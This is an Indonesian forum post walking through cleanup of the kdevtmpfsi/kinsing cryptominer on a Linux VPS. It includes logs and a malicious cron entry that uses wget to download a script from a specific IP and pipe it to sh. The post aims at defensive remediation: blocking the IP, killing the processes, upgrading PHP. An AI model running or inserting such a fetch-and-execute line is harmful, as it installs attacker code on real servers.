Cara mengatasi malware kdevtmpfsi

Ciri-ciri:

  • Ketika vps / server di cek TOP , ada proses mencurigakan seperti ini /tmp/kdevtmpfsi
  • malware kdevtmpfsimalware kdevtmpfsi

Penanganan cepat:

Kalo dicek mendetail id proses 18447, ternyata sebuah cron yang mendownload dan eksekusi file dari server tertentu. Dikasus ini si malware download dari ip 195.3.146.118

[email protected]:/# systemctl status 18447
● cron.service - Regular background program processing daemon
   Loaded: loaded (/lib/systemd/system/cron.service; enabled; vendor preset: enabled)
   Active: active (running) since Wed 2021-03-24 18:47:45 UTC; 2h 38min ago
     Docs: man:cron(8)
 Main PID: 142 (cron)
    Tasks: 16 (limit: 4915)
   CGroup: /system.slice/cron.service
           ├─  142 /usr/sbin/cron -f
           ├─ 2398 /tmp/kinsing
           └─17398 /tmp/kdevtmpfsi

Mar 24 18:34:01 root.domain.xyz CRON[16761]: pam_unix(cron:session): session closed for user www-data
Mar 24 18:35:01 root.domain.xyz CRON[16771]: pam_unix(cron:session): session opened for user www-data by (uid=0)
Mar 24 18:35:01 root.domain.xyz CRON[16772]: (www-data) CMD (wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1)
Mar 24 18:35:02 root.domain.xyz CRON[16771]: pam_unix(cron:session): session closed for user www-data

Block ip sumber malware tersebut,
Kalo pake vps di JH, block ip sumber malware dengan CSF, dan pastikan sudah gabisa diping dari dalam vps.

[email protected]:/# csf -d 195.3.146.118
[email protected]:~# ping 195.3.146.118
PING 195.3.146.118 (195.3.146.118) 56(84) bytes of data.
From 103.157.96.33 icmp_seq=1 Destination Port Unreachable
ping: sendmsg: Operation not permitted
From 103.157.96.33 icmp_seq=2 Destination Port Unreachable
ping: sendmsg: Operation not permitted
^C
--- 195.3.146.118 ping statistics ---
2 packets transmitted, 0 received, +2 errors, 100% packet loss, time 999ms

 

Ditinjau dari log system diatas, cron dijalankan oleh user www-data. Cek apakah didalam user ini memang sudah tertanam cron tertentu

su -c "crontab -e" www-data -s /bin/bash

Ternyata benar, ada cron permenit untuk download dan eksekusi malware. Lakukan comment atau kasi pagar cron tersebut agar tidak bisa jalan

#* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

Restart cron, untuk memastikan perubahan terimplementasi

systemctl restart cron

Harusnya sampe sini, si malware tidak mampu menyembuhkan dirinya sendiri. Karena cron otomatisnya sudah hilang.

Langkah selanjutnya, cek proses malware yang masih jalan. Lalu kill proses malware tsb

[email protected]:/# ps -aux | grep kdevtmpfsi
www-data 17398  104 76.1 2661856 2395592 ?     Ssl  21:21   8:38 /tmp/kdevtmpfsi
root     17561  0.0  0.0  11452   724 pts/1    S+   21:29   0:00 grep --color=auto kdevtmpfsi

[email protected]:/# ps -aux | grep kinsing
www-data  2398  0.0  0.5 718472 17152 ?        Sl   19:01   0:01 /tmp/kinsing
root     17563  0.0  0.0  11452   724 pts/1    S+   21:29   0:00 grep --color=auto kinsing

[email protected]:/# kill -9 17398  2398

Berhasil, cek dengan TOP malware sudah berhenti. Ditunggu beberapa saat, malware tidak muncul lagi.

malware sudah berhentimalware sudah berhenti

Kemungkinan penyebab malware & solusi permanen:

Salah satu penyebabnya adalah ada celah exploit di php-fpm.

Solusi permanennya adalah dengan melakukan upgrade versi php ke latest stable (per artikel ini ditulis versi terbarunya adalah 7.4.16)

Sprinter Asked on 25 March 2021 in VPS.
Add Comment
0 Answer(s)

Your Answer

By posting your answer, you agree to the privacy policy and terms of service.